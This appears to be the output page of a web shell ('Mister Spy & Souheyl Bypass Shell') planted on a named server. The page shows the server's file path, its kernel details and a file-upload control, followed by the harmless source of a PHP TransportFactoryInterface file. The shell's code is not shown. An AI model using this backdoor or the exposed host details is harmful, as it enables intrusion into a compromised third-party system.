Welcome To Our Shell

Mister Spy & Souheyl Bypass Shell

Current Path : /var/www/html/ift/vendor/consolidation/site-process/src/Factory/

Linux ift1.ift-informatik.de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Upload File :
Current File : /var/www/html/ift/vendor/consolidation/site-process/src/Factory/TransportFactoryInterface.php

<?php

namespace Consolidation\SiteProcess\Factory;

use Consolidation\SiteAlias\SiteAliasInterface;
use Consolidation\SiteProcess\Transport\TransportInterface;
use Consolidation\Config\ConfigInterface;

/**
 * TransportFactoryInterface defines a transport factory that is responsible
 * for:
 *
 *  - Determining whether a provided site alias is applicable to this transport
 *  - Creating an instance of a transport for an applicable site alias.
 *
 * There is always a transport for every factory, and visa-versa.
 * @see Consolidation\SiteProcess\Transport\TransportInterface
 */
interface TransportFactoryInterface
{
    /**
     * Check to see if a provided site alias is applicable to this transport type.
     * @param SiteAliasInterface $siteAlias
     * @return bool
     */
    public function check(SiteAliasInterface $siteAlias);

    /**
     * Create a transport instance for an applicable site alias.
     * @param SiteAliasInterface $siteAlias
     * @return TransportInterface
     */
    public function create(SiteAliasInterface $siteAlias);
}

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped) Email: contact@elmoujehidin.net